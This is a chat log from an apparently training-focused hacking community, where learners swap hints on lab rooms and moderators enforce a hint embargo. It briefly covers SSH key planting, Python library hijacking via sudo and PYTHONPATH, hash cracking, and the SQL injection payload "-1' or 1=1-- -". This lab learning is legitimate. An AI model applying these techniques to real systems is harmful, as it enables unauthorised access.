#room-hints

1 messages ยท Page 79 of 1

ripe hedge
#

once you figure our what the shell is, it should be simple enough

wicked bolt
#

i was up til 4am last night doing random sudo and kernel exploits for user flag and nothing worked ๐Ÿฅฒ I probably missed something

ripe hedge
#

you're overthinking

#

which flag?

wicked bolt
#

user.txt

ripe hedge
#

an

#

ah

#

did you get into robert's account?

wicked bolt
#

i got the pass but ssh disabled for it and no home folder no entry in /etc/passwd

ripe hedge
#

yeah...there's a bit of guessing involved

wicked bolt
#

tried the pass for all user accounts in /etc/passwd

ripe hedge
#

it's not on that machine exactly...

wicked bolt
#

i gotcha ๐Ÿ˜„ /etc/hosts

#

unless i don't gotcha

ripe hedge
#

the creds you got should hint at something

#

the form of the creds

#

there's also an entry in the passwd file that'll hint a bit

atomic valve
#

Hello folks, I am currently on Linux:Local Enumeration and I am stuck...on SSH of all things (task 3). is there something not listed in the steps that I am missing? if anyone could kick me in the right direction I would greatly appreciate it.

wicked bolt
ripe hedge
#

it's not a CVE for python

#

you'll understand when you see it

ripe hedge
#

seems clear to me

atomic valve
#

thanks for the response. im typing up my steps atm. i didnt want to write a wall of txt while you 2 were discussing lol.

ripe hedge
#

๐Ÿ‘

atomic valve
#
  • I have created the key pairs using key-gen on my attackbox...grab the contents of the id_rsa.pub and copied them into the authorized_key folder on the victim.
    -I also had to run ssh-keygen on victim as the .ssh folder did not have an "authorized_keys" folder
    -I also have the id_rsa of the box I am attacking saved to my attack desktop (with permissions 600)
    -When running "ssh -i id_rsa manager@<boxIP>" i get to the password prompt... and then stuck
ripe hedge
#

authorized_keys is a file

#

and I think you can use ssh-add to update that

#

I think you're trying too hard though

atomic valve
#

im sure you're right lol

ripe hedge
#

@wicked bolt think about what creds exist for robert, there is obviously a service that can use those creds

#

problem is finding it

atomic valve
#

so about the auth_file...do i need to run "ssh-keygen" so that file appears? cause it was not there at first.. (or am I just going the wrong direction)

ripe hedge
#

you can create it normally

#

or use ssh-add

#

unless there's no agent

#

you can create it manually

#

no need to run ssh-keygen

#

at least not on the victim box

#

though you could, then download the private key and use that

#

probably still needs the authorized_keys though

atomic valve
#

and i did try that as well (prob did it wrong but that was what I was going for lol). i added my attackbox id_rsa.pub to the newly created authorized_keys file....and then also copied the private key of the victim to my attack box and modified permissions to 600. then tried to login using the priv key but still no dice. o well. Ima keep bangin away.

ripe hedge
#

can you screenshot the remote .ssh directory?

#

oh

#

yeah do one or the other, not both

#

either you use the attackbox ssh key, in that case you add its public key to authorized_keys

#

OR you generate a keypair on the target and use that private key

wicked bolt
#

Hydra, I think I have potentially found something from 'ip route'. Cheers

ripe hedge
#

oh does that work?

#

I wrote a port scanner in python...

atomic valve
#

that makes sense. ok im gonna start this section over. thank you for your help.

ripe hedge
#

good hunting

wicked bolt
#

i got it :D:D:D

ripe hedge
#

huzzah!

#

and now the hint makes sense

#

root should be easy enough once you know what you're dealing with

wicked bolt
ripe hedge
#

the hint for user I mean

wicked bolt
#

OH. YEP. now it makes sense after checking for some certain thing.

#

and i can imagine how to get root on the 'top level' from here but I'll have to do some research

ripe hedge
#

there's a serious misconfiguration

atomic marten
#

need haaalpppp

ripe hedge
#

@atomic marten just ask the question, please

atomic marten
#

mission 12 flag in linux agency.. Couldnt understand the hint

#

neither got the flag

wicked bolt
ripe hedge
#

good hunting

#

@atomic marten the hint is a bit weird.

atomic marten
#

Very weird. What is EVS though?

ripe hedge
#

EVs

#

maybe is better

atomic valve
#

๐Ÿ˜† ๐Ÿ˜† ๐Ÿ˜† ...got it first try this time. amazing how frustration just makes crap more difficult lol. thank you again @ripe hedge

ripe hedge
#

haha yeah, taking a break helps sometimes

atomic marten
ripe hedge
#

a certain type of variable

wicked bolt
#

got root on the main machine easily. But still that blue whale hint doesn't make sense. Oh well room done ๐Ÿ˜„

ripe hedge
#

check out the logo

atomic marten
ripe hedge
#

@wicked bolt

wicked bolt
#

haha amazing yeah ok makes sense. I enjoyed the 'green indian bath soap' one i had to google it and try to find it. The hint is harder than the solution!

ripe hedge
#

yeah I googled that too

#

I saw blue whale and yeah, but I'm used to using that thing

atomic marten
#

Did yal do linux agency in one day?

wicked bolt
#

not sure how i didn't see any files related to that during my whole run through the machine. I feel like i have more of an understanding what's on that host than on my own

ripe hedge
#

I did it in about 3-4 hours?

#

heh there's an entry in /etc/passwd

#

and a group

#

but none of the users can run it. Still not sure who the diane user is though

wicked bolt
#

you mean the zerotier thing? I didn't make that link

#

i googled it but didn't understand it's for that

ripe hedge
#

no there's another user lying around

#

no matter

wicked bolt
#

strange. It's not in /etc/passwd but is in /etc/group

ripe hedge
#

should be user 127 or something

wicked bolt
#

I wanted make sure i'm not going mad but defo not showing in passwd for me vargcooctus I learned a lot from this room and it was very enjoyable! ๐Ÿ˜„

ripe hedge
#

hmm, oh well

#

make sure it's the passwd from the main host, not the container

agile halo
#

Does anyone know what's up with the password hash pastebin-link in the Introduction to Django room? It's not necessary for any flags, so I was just wondering.

wicked bolt
#

@ripe hedge you found the IP via a python script you said? so like a local nmap-like thing

ripe hedge
#

the port, yeah

#

it's a pretty dumb script tbf

wicked bolt
#

wait you can just connect to a port on the same machine?

ripe hedge
#

yes?

#

did you do something silly?

wicked bolt
#

can I pm

#

I've already done it

young warren
#

Hey guys I've been working on the Linux Agency room, but can someone explain what EVS is?

ripe hedge
#

go ahead

#

EVs is probably the better hint

young warren
#

Oh lmao I was looking for what the acronym would stand for

cyan sage
cyan sage
gusty kite
grim heron
#

anyone knows how can I distract a snake ?๐Ÿ˜†

ripe hedge
#

ooooh it's a snake(y) shell

gusty kite
ripe hedge
#

gods I'm old

gusty kite
#

yep

ripe hedge
#

half the people here weren't even born what that came out

gusty kite
#

I did not try it until mid 90es

cyan sage
gusty kite
#

wow it's been a while since the thm hash wasnt to be found in the rockyou list

gusty kite
wicked bolt
#

haha the money thing got me for a while but there might be a way to read what it wants from you

ripe hedge
#

should be a way to read strings from a binary...

gusty kite
#

I wonder if the robert task is the obvious way or if I am overlooking something and just waists time cracking hash

twin horizon
#

looking for a hint for overpass3 thanks

trim haven
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
stuck fractal
flat dawn
#

anyone is onto linuxagency ?,

gusty kite
#

half the people here ๐Ÿ™‚

flat dawn
#

how to crack md5 of mission1 ? l have tried some solutions couldnt come up

#

hash looks hashcat m0 but couldnt come up

stuck fractal
#

Try online crackers for md5

flat dawn
#

tried not working

#

any valuable hints?

atomic marten
#

Just provide the password in the md5 form itself.

#

๐Ÿ™‚

balmy verge
atomic marten
#

struggling with 26

flat dawn
#

but su mission1 and that hash wont giving authority

balmy verge
#

ah ok

balmy verge
flat dawn
#

lol

#

cryin now

atomic marten
#

use the entire thing

flat dawn
#

thx

atomic marten
#

Like.. the entire flag

#

yeah .. it was menioned in the text above the challenge

#

XD

winged ledge
#

@atomic marten may I ask you for a hint in the DM?

balmy verge
#

anyone in the priv esc section ?

atomic marten
balmy verge
#

need a little help with getting jordan ik what im supposed to do but no luck yet

balmy verge
#

ah hydra didnt wanna ping u

balmy verge
#

yea yea ik what i gotta do

ripe hedge
#

have fun

balmy verge
#

but i dont know where i should put the thing

#

i dont have write perms

ripe hedge
#

put it somewhere else then

balmy verge
#

i tried adding to path

#

and everything

ripe hedge
#

the snakey path?

balmy verge
#

ohhh

ripe hedge
#

there was a room somewhere that exploited this...

balmy verge
#

give me a sec

ripe hedge
#

I think it was Wonderland

balmy verge
#

yea wonderland

#

but u had write perms there

hexed crescent
#

Please, no hints on Linux Agency for 72 hours. I know it shows as a Walkthrough room, but it is really a challenge room. The only reason it was changed to Walkthrough is to keep the amount of points for the room in-check. Remember, hints spoil it for people who like to complete the room without hints. ๐Ÿ™‚

ripe hedge
#

eh, @trim haven said it was fine

#

shrugs

trim haven
#

@hexed crescent As it is marked as a walkthrough room, I went under the impression it's a walkthrough, wasn't made clear.

hexed crescent
#

Yeah, it's confusing. I pinned my message to make it more clear.

wary lark
#

Not a spoiler or a hint on Linux Agency, but I'm on the struggle bus trying to get Dalia's password

#

Waaaa

hexed crescent
#

You don't need it. ๐Ÿ™‚

wary lark
#

I need to try harder and smarter

hexed crescent
#

Think like Agent 47. ๐Ÿ˜„

balmy verge
#

yea im still stuck on jordan

wary lark
hexed crescent
#

Think outside-the-box in order to survive. ๐Ÿ˜„

ripe hedge
#

haha that's a huge hint

atomic marten
still dust
#

what does "Send the money to another country" hint for bribe means?๐Ÿค”

hexed crescent
#

It's a cryptic hint of what to do for the task.

ripe hedge
#

yeah....you'll understand once you finish the task

hexed crescent
#

If English is not your first language, it might be a bit harder than usual.

balmy verge
#

hydra can i DM ?

still dust
sage hawk
#

Anyone complete the ZeroLogon room? That was a fun little project

#

The modification of zerologon_test.py is very simple, once you have that correct you are 4 commands away from scoring a root Powershell in the domain controller

atomic marten
#

hey. when I get viktors flag then that means I get viktors password right? Similarly when I got dalia's password I am trying to change the user to dalia its showing that the password is wrong

#

Why?

balmy verge
#

no its not their passwords

#

its just their flags

atomic marten
#

I have been loggin in with their passwords since the last exercise

balmy verge
#

that was for the fundamentals

#

not the priv esc section

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

The linux agency room is still under hints embargo

ripe hedge
tranquil ivy
#

Im playing linux agency
I am on mission22
Plz help me
Hint is
Sh!oot! we are surrounded by snakes and need a good way to escape from here...
Im stuck

astral smelt
tranquil ivy
white salmon
#

i need help with a linux fundamentals 2, trying to find shiba3's password but dont know how to do it!!

stuck fractal
#

What does the task say?

white salmon
#

This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.

#

how do i find out if test1234 exists??

stuck fractal
#

You don't

#

That's what the binary does

#

You need to make those checks pass

#

Create and set the variable

#

Run the binary

white salmon
#

with touch command?

stiff jolt
#

search more about how to declare env variables

stuck fractal
#

No. Touch creates files.

#

Read back over the $ task.

white salmon
#

oh, i see its exporting

#

set the environment variable, thanks!

strange mist
#

maybe the information that the flags are not the user passwords in the privilege escalation part of the most recent room should also be pinned

balmy verge
#

Did u finish the room ?

strange mist
#

nope

tulip mural
#

Any hints for mission 8 of Linux agency?

stuck fractal
tulip mural
#

Oof

#

Kk

eager saffron
#

Can someone hint me about Mission8 in Linux Agency ?

eager saffron
#

got it ๐Ÿ™‚

atomic marten
#

so lets say I am in silvio's machine. I generate a ssh key and put the public one in silvio's authorized keys and I get the private key with the help of a python server, and I have set all correct permissions , then why cant I ssh into the machine as silvio???

#

It says the connection is refused by port 22

#

๐Ÿ˜ฆ

#

Its very difficult because I cannot save my progress in anyway.. ๐Ÿ˜ฆ

feral parrot
#

Check /etc/ssh/sshd_config. Only few users can login using SSH

atomic marten
#

So the privesc portion, I have to do without ssh??

feral parrot
#

Yes

atomic marten
#

Then I have to do all of them in one go. becaus ethe passwords arent the login passwords they are just flags

#

๐Ÿ˜ฆ

stuck fractal
#

@atomic marten @feral parrot @eager saffron You have all been made aware that rule 13 applies here. The next time will be a warning or a mute.

atomic marten
#

๐Ÿ‘

white salmon
#

stuck on Linux Agency mission12 flag, hint "Maybe it is time to study some EVS", any more suggestions?

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

white salmon
#

k

dim wasp
#

Please try your best in the 1st 72hours of the release of linux agency after that if you are unable to solve something I would be very grateful to help you

dim wasp
#

Yes Sir

stuck fractal
#

Because if you are, you're free to override that policy if you want

dim wasp
#

No I am fine with the rule as its competitive for 1st 72 hours after that its just learning

stuck fractal
#

Cool, ok

dim wasp
stuck fractal
#

Not yet

white salmon
#

i attempts room @dim wasp

solar needle
#

Dalia is being mean to me ๐Ÿ˜ญ

dim wasp
#

Nearly 48hours of try harder to all of you

white salmon
#

@dim wasp i show you how i get the root?

dim wasp
white salmon
#

@dim wasp i follow intended route because it was straightforward

#

didnt search for unintended

dim wasp
#

Nice jobupvote

#

I hope you enjoyed the Room

white salmon
#

yes, was fun ty

gusty kite
#

yeah fun room but the hints are mostly confusing me more than helping ๐Ÿ˜„

tranquil ivy
#

Reached mission28

#

No idea what to do

#

๐Ÿ˜ซ

prime ibex
trim haven
#

Deja vu

stiff jolt
#

@dim wasp nicely made room i am almost completed ( or have i? ) onoto privsec stuff

wary lark
hexed crescent
#

This is the room-hints channel. If you want to report something not working, please use the #room-bugs channel.

brave bear
#

oops sorry

#

i will transfer my query there

wicked bolt
#

I used google...

timid sequoia
stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

stuck fractal
#

@timid sequoia Not yet.

timid sequoia
#

okok

wicked bolt
#

mainly because i'm not sure if they're intended or not ๐Ÿ˜†

hexed crescent
#

Please read the pinned messages.

cyan sage
#

I get it

jaunty kite
gusty kite
ripe hedge
#

Sparrows sell them

hollow lynx
#

@dim wasp just completed the Linux Agency box. what a time machine ride, rewinds so many things. thanx manblobfingerguns

eager vale
hollow lynx
eager vale
#

Gotcha! I'll try harder ๐Ÿ™‚

stuck fractal
eager vale
#

And thanks for clearing that up, I was often confused at newly released rooms showing age >0

white salmon
#

on sql injection 3,4

#

why do you have profileID=-1' or 1=1-- -

#

im confused about the minus one

#

the rest make sense

hollow lynx
white salmon
#

yeah

#

it gives positive results without -1

#

they both work

#

yeah its probably a typo

stuck fractal
#

I mean

#

It could just be a randomly chosen value

white salmon
#

maybe

#

good job people for the help

hollow lynx
#

Try to debug the query if it makes any sense

white salmon
#

too hard

#

wait I think I know what you mean

tranquil ivy
#

Bruh
Someone uploaded linux agency walk through
On the net

#

Let the people play

#

I did the first part already Linux fundamentals
Was really fun playing it

white salmon
#

found the query

#

SELECT uid, name, profileID, salary, passportNr, email, nickName, password FROM usertable WHERE profileID='-1' or 1=1-- -' AND pass...

#

it does make sense now

#

i see why the minus one doesn't make a difference

#

Thx

stuck fractal
tranquil ivy
#

Just don't go looking for them
@stuck fractal
Yes sir

#

But still
It should be a fair game at least for some hours

#

Btw there's no fun seeing the solutions then solving

stuck fractal
#

You're not allowed to post them in the discord unless they're approved on the site

tranquil ivy
#

Hmm

#

Nice

white salmon
#

Guys am not able to download sparky 2.8.3.(dkg) it's showing parallel read and NT_ something error in "Ra room" can anyone help me with that?

crisp burrow
#

LINUX AGENCY : I got into r*(user.txt) and now i don't know what to do! any help?

stuck fractal
#

!rule 13

proud scarabBOT
#

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

crisp burrow
#

okay

ripe hedge
#

See rule 13

stuck fractal
#

-warn @white salmon Please remember rule 13 and don't try to bypass it by telling people to DM you.

green minnowBOT
#

โš  Warned helpme#7993

ripe hedge
#

There is a pin...

stuck fractal
#

@white salmon please don't ask the same question across multiple channels at the same time

white salmon
#

Ok ๐Ÿ‘

last fractal
#

I am stuck at mission24 in "Linux Agency" room. I have looked at dig, host and /etc/hosts but found nothing. Missing to understand the hint ( I guess it is related to regex or '{' but unable to relate how to use it). Can someone help?

jaunty kite
gusty kite
zenith owl
#

jordan is killing me lol

candid nimbus
trim haven
#

Please do not send writeups.

neon gazelle
#

Ok sorry

blazing thorn
#

no help/hints within 72 hours of it being released

last fractal
#

@blazing thorn - thanks for the information, I was able to get past

civic tusk
#

hi i'm currently doing cyborg room and i have ||cracked the password for music_archive but i'm unable to go any further i tried ssh with same creds but it didn't work is there something i'm missing or should i look somewhere else?|| just give me a tiny nudge i will find the rest

blazing thorn
onyx crescent
blazing thorn
#

yup, can't recall where exactly but it's there ๐Ÿ™‚

civic tusk
#

actually i digged a bit and found ||some binaries and on running them the provide borg seg@?:not found which borg segment|| i will still keep digging to see if could find anything there and in other files

onyx crescent
odd nebula
#

Hi everyone I am currently on the SET Room, and having some issues ||capturing hashes when using the ZIP File|| can anyone give me a nudge or hint on what I am doing wrong?. Thanks!!

civic tusk
silver otter
#

never mind, found it ๐Ÿ˜„

#

in room "Physical Security Intro" - (cool room btw) - I have tried a number of different things that could do this but not the expected answer;
The second answer for "An improperly hung door which opens away from you can be bypassed using this type of tool?"

  • anyone who has done this got any hints? last question I can't get for this room.
stuck fractal
silver otter
#

no, I had another room question that I did work out only after posting haha

#

this one I did not find

stuck fractal
#

Ok, it's ||something you can do to padlocks too|| that's quite a big hint
You're pulling the latch back from the strike plate, by sliding something in

silver otter
#

Can I DM you @stuck fractal ?

stuck fractal
#

I can't think of a way to say anything more without spoiling it and I'm about to grab food. I'm not sure DMing me would help that much

silver otter
#

ok no problem, thank you I'll see what I can do

#

This question is repeated I guess and the first answer was something you can do to padlocks as well so I was just not sure if you were giving hints for the first copy of the question or second ๐Ÿ˜„ but I'll take the advice and see what else I can find

stuck fractal
silver otter
#

I had some ideas that even fit the lettering and were in the referenced video's but it didn't work, i'll keep digging ๐Ÿ™‚

stuck fractal
#

Oh

#

Well that's confusing

silver otter
#

hahah, yeah a little

#

to ask about, anyway

blazing thorn
#

check Deviant's "resources" page, it's on there

#

โ˜๏ธ same hint I got, helped me find it

silver otter
silver otter
blazing thorn
#

yup, was new to me too ๐Ÿ™‚

naive grail
#

"physical intro" must be the hardest room on THM.. took 2 months, average, I think.
much more if you are not english language native.

blazing thorn
#

English language native, found it tough

odd nebula
#

Can I DM someone for the Set Room? Having some issues for the Hash Capture

little sable
candid nimbus
stark ridge
#

dalia's flag is driving me crazy lol D:

urban tiger
#

Any tips on what could I look to continue the room internals ? I have managed to get the credentials to enter the wp-admin. Tried to find some vulnerabilities on wordpress, but they requiere me to install plugins which I can't seem to do, and I can't edit the ones already installed because I don't have permissions. Am I missing some vulnerability there ? Should I go for another route instead ?

lofty girder
#

Haven't done that room in particular but there's a generally reliable way of getting malicious code to execute with stock WP dashboard options

#

And you won't be able to install plug-ins unless you're compiling from source as vulnerable machines are not connected to the Internet

urban tiger
#

Alright! Thanks

stark ridge
ashen scaffold
stuck fractal
#

@spare lagoon Rule 13 applies here, no help or hints yet

spare lagoon
#

oh sorry, my bad

urban tiger
#

Thanks Alex, I will think about that when I come back to it.

mystic meadow
junior pumice
#

Hello all, i am doing Skynet, and I am at the point where i got into the squirrelmail inbox and got the Samba password for Miles. The run through says go into Miles share drive. His share drive says"NO ACCESS" when I smbmap it. I then try to smbclient //10.10.252.216/milesdyson to try and get into his share with the password that i got. says tree connect failed: NT_STATUS_ACCESS_DENIED

#

Anyone know how i can get into the share drive?

light phoenix
#

Hi, please help, I'm really stuck at physical intro room. Exactly at hardware bypassing. Question 3, 5 and last. I have been searching for hours

trim haven
#

@light phoenix Please only post in one channel.

light phoenix
#

sorry ๐Ÿ˜ฆ

junior pumice
stuck fractal
#

You're not specifying a username

junior pumice
#

ok thought it was in the syntax

stuck fractal
#

No

junior pumice
#

my machine just shut down, gonna be aloser and finish this tomorrow

stuck fractal
#

That's the share name

junior pumice
#

so

#

smbclient //10.10.252.216/milesdyson -u milesdyson

#

?

#

when i tried that, it said the same NT_STATUS_ACCESS_DENIED

#

didn't ask for my password

stuck fractal
#

It's case sensitive as the other person said

#

As in case matters

junior pumice
#

ah gotcha! Switch right

#

TY Sir!

rose cape
#

any subtle hints for cyborg, ive got the info for ||squidproxy and the password|| not sure what to use it for, not familiar with this proxy, have tried triggering basic auth via port ||3128||could i get a push in the right direction? gracias

chilly wigeon
#

you should look at cy"borg"

river path
#

Anyone able to give me a little nudge with Year Of The Rabbit room? I have made it up to the point where ||I found the ftp account and have got Eli's_Creds.txt, I have thrown the file into cyberchef with some common operations and nothing came of it, I have also removed everything but the .- characters to see if it was morse code hidden in there and that gave me nothing|| Don't really know where to go from here, cheers!

white salmon
#

Any hint on Silvio's flag in the room Linux Agency

stark ridge
#

@white salmon i think no help or hints, rule 13

simple mountain
#

Yah, thatโ€™s correct. Although I believe itโ€™s 7pm (GMT) tonight when hints are ok

white salmon
pseudo scroll
white salmon
#

I mean I'm trying to do find ./test1234

pseudo scroll
#

yea the second part of instructions mentions what you need to do

white salmon
#

Yea I got it. Ended up looking at a walkthrough, but I do understand it so that's good!

devout tangle
#

Hint for linux agency mission4

devout tangle
#

Oh Thanks

candid nimbus
flat dawn
#

can we ask hints on Linux agency now?

hollow swan
#

@flat dawn 72hrs isn't over yet

flat dawn
#

allright

distant python
#

0day room, I am having trouble compiling the ||kernel exploit|| , following error stops me ||gcc: error trying to exec 'cc1': execvp: No such file or directory||. Anybody else had this problem?

fleet pagoda
#

hi all, in the nmap section - task 14 "practical" what is the target ip address?

distant python
#

I saw the ||cc1|| file exists on ||/usr/lib/gcc/x86_64-linux-gnu/4.8/||. Tried adding it to the PATH but same result

#

||/usr/local/bin:/usr/local/sbin:/usr/bin:/usr/sbin:/bin:/sbin:.:/usr/lib/gcc/x86_64-linux-gnu/4.8/|| Srry, edit

trim haven
#

@lunar pulsar Room-hints is for people who want a nudge, please avoid suggesting write ups in this chat :)

storm venture
#

can I pm anyone about Keldagrim, just have one or two questions

hexed crescent
#

No asking for hints on that one @storm venture The room is brand new.

storm venture
#

Ahh right, my bad

faint plume
#

Linux Fundamentals Part 2, Task 11
I have both ||$USER|| and ||$test1234|| set as ||shiba2|| but when I try to access the ||shiba2 binary|| it says ||cat: /etc/shiba/shiba3: permission denied||

#

is there something I'm missing here ๐Ÿค”

#

I do have to leave for work soon so I'd really appreciate it if I can get a hint or two soon ๐Ÿ™

vapid dust
#

can u use sudo?

faint plume
#

nop

#

for the record I have done ||export test1234=$USER||, which seems to be the solution I've found through searching the channels

vapid dust
#

but $USER is not set to anything

#

so i don't think using export test1234=$USER would do anything

faint plume
#

^ I did not have this issue

#

$USER was set to shiba2 for me

vapid dust
#

what?

#

it's not set to shiba2 for me

#

u deployed the machine or started attackbox?

faint plume
#

I ssh'd in using putty

vapid dust
#

i can't even understand what's going on

#

what am i supposed to do?

#

what is manpreet108 typing?

faint plume
#

dang dude chill

urban merlin
#

Hi Everyone
I am new in this group and recently join Tryhackme . I am doing practice on buffer overflow and unable to get reverseshell
I am able to find offset value, badchar, ESP JMP value and return address and open local port on machine and at the end when i generate reverse_shell and run exploit .Again oscp.exe application crash but not getting reverse shell.
I go through all youtube videos and websites and doing same process but unable to figureout what is wrong .
So Please Please advise as i am stuck on this from few days . plsssssssss

vapid dust
#

i'm chilling already

faint plume
#

im gonna try terminating and relaunching the machine and see if that fixes my issue

faint plume
#

ok apparently restarting the the machine fixed the issue ๐Ÿ‘

#

that was a weird one

#

I had the solution right but for whatever reason it wouldnt work ยฏ_(ใƒ„)_/ยฏ

white salmon
#

could anyone possible answer a question regarding the Windows PrivEsc Room?

#

its in regards to the rogue potato method of obtaining system, it keeps making referce to the same binary for popping a shell, but it wants me to execute that binary while already in a shell created by that binary, so the ports in use

#

seems to me I would need a second binary configured to a second port, is this correct?

stuck fractal
#

@white salmon please don't ask the same question across multiple channels

midnight spindle
#

Hey guys , any hint about " how install custom lib in Python " ? ๐Ÿ™‚

stuck fractal
#

@midnight spindle what room?

white salmon
#

phew, finaly root on linux agency - its was hard - I learned so much - big thanks to the guys who made this room

sturdy folio
#

Linux Agency still under rule13?

midnight spindle
#

@stuck fractal I THINK it will be usefull for Linux agency ^^

stuck fractal
#

@sturdy folio yes

#

@midnight spindle Rule 13 still applies here

midnight spindle
#

ok ๐Ÿ™‚

strange mist
#

@dim wasp Hey, man, your linuxagency room was AWESOME. Felt like a CTF.

sturdy folio
#

learnt some new stuff from Linux Agency and built up on basics xD but still stucked at last flag

gaunt sonnet
#

hey all, hope you are all well.

#

i am a little bit stuck on the Linux fundamental 2 room where you have to log in to putty with the shiba2 account, when i go to log in it says that my connection has timed out. Has anyone else had this issue?

astral smelt
#

Are you connected to the vpn?

gaunt sonnet
#

nope, haha can tell i am new to this, that worked thank you very much.๐Ÿ˜€

scenic oyster
#

Still stuck on the Adams Rite bypass. Have been down the knight rabbit hole. Believe that I could now speak well to how knights fought, what they wore and siege tactics. Feel like I am coming at this from the wrong direction.

stuck fractal
#

Something they hold

#

Also used by spacecraft to protect against heat, something similar to protect against radiation

candid nimbus
still fern
#

can someone please give me a hint for user.txt in linux agency??

scenic oyster
stuck fractal
#

@still fern not yet

#

2 hours left on the hints embargo

still fern
#

ok

light tide
#

SQL Injection Lab Task 3 help ?

stuck fractal
#

@kind bear this is the room hints channel

rose cape
midnight spindle
#

@dim wasp and @hollow swan : thanks a lot for the linux agency room ! It'was really nice !!

hollow swan
#

@midnight spindle glad you enjoyed our room๐Ÿค“

white salmon
#

good job @hollow swan and @dim wasp on the linux agency room

#

I'm now stuck at sean flag, but really fun so far.

white salmon
#

@white salmon did you already got dalia's shell

clear swift
#

hey guys, I am trying brainpan room and i'm a bit stuck after gaining a shell. After running linpeas there is sth that ||can be executable with sudo /home/anansi/bin/anansi_util||. Am I in the correct path or should I look elsewhere?

white salmon
white salmon
keen cypress
#

Linux agency bludit Kills me. Mission 1 to 29, easy. But 30 i have nรถ idea๐Ÿ˜ฉ

#

No PHP on the server. The hint doesnt Help.

balmy verge
brave holly
#

can someone give me a hint? (Theseus room the first question ) After decoding that message in the main page it`s telling about key, but what key?

balmy verge
#

if im not mistaking

keen cypress
#

@balmy verge thx. Will have a look

white salmon
#

Any hint on sean flag for linuxagency room would be appreciated

balmy verge
solar needle
#

In the Linux Agency Room:Jordan, should I be able to read the file (ls -lah suggests not). Iโ€™m looking at ||python hijacking|| as suggested by others, but these seem to need me to know what ||modules are being imported, and then poison those based on the Python search order||.

solar needle
#

Yes Iโ€™m seeing examples of that, but donโ€™t I need to know ||what modules the Gun-Shop.py|| script is importing?

balmy verge
#

if u run sudo -l u || can run the script as jordan and when u run it u'll see a python error which tells u the name ||

solar needle
blazing thorn
#

Python not my strongest point so that is going to be an issue ๐Ÿ™‚

balmy verge
#

yes that was a weird error someone else dm'd me had, i didnt have that error tho

#

can i dm

blazing thorn
#

ofc ๐Ÿ‘

pure thistle
#

can anybody offer a hint for linuxagency mission4 flag

ripe hedge
balmy verge
red arch
#

Hi guys, can someone help on linux agency room at dalia's flag?

ripe hedge
#

Got Dalia or trying to get Dalia?

red arch
#

trying to get dalia

ripe hedge
#

Tick tock...

red arch
#

i've found the script

#

but it always change from the root

ripe hedge
#

You've got it then

#

You have 30 seconds to modify it before it gets executed and mashed again. Tick tock.

pure thistle
ripe hedge
#

Are you in the right place?

balmy verge
red arch
ripe hedge
#

There's a watch command that may be useful

blazing thorn
#

date is helpful too

pure thistle
solar needle
ripe hedge
#

watch cat scriptname.sh

solar needle
ripe hedge
#

You're trying too hard

blazing thorn
#

๐Ÿ˜ฆ getting that error too @solar needle

ripe hedge
#

Why pam_open_session?

solar needle
#

Seems to be the function thatโ€™s being called?

blazing thorn
ripe hedge
#

Who cares?

#

I just spawned a shell

balmy verge
#

its giving some ppl a weird error whe they try to run the script with sudo

ripe hedge
#

Yeah but they're overthinking it too

#

Lib they're using seems broken

#

You want to hijack the Lib call

sterile dawn
#

Actually is there any problem with user4?

blazing thorn
#

@ripe hedge I can't get to the lib call stage

sterile dawn
#

I used export PYTHONPATH

#

But it didn't worked

ripe hedge
#

You'll call the shop library by running gunshop

#

Hijack that

sterile dawn
ripe hedge
sterile dawn
ripe hedge
#

Use /tmp or chmod?

#

How else?

sterile dawn
#

I was using /home/reza lol

#

๐Ÿคฃ

ripe hedge
#

So did I

sterile dawn
#

It worked?

ripe hedge
#

But I changed the access rights first

solar needle
sterile dawn
solar needle
ripe hedge
#

Chmod is sufficient

sterile dawn
#

Chmod 777๐Ÿ˜‚

ripe hedge
#

Sure it's overkill bit sure

balmy verge
blazing thorn
#

yup, used that

balmy verge
#

and it worked for me

solar needle
#

Iโ€™m not seeing a missing module error

balmy verge
#

yea dont know why some people get that error

sterile dawn
#

@ripe hedge ok export PYTHONPATH=/home/reza and then place shop.py there and chmod 777 and just run it ok

ripe hedge
#

You'll need to set the path for Jordan in the sudo command

blazing thorn
#

Anything unsual in my current env?
||LS_COLORS=
LANG=en_US.UTF-8
LESS=-ix8RmPm Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$PM Manual page git-config(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB%.. (press h for help or q to quit)$
SUDO_GID=1033
OLDPWD=/home/reza/tmp
USERNAME=reza
USER=reza
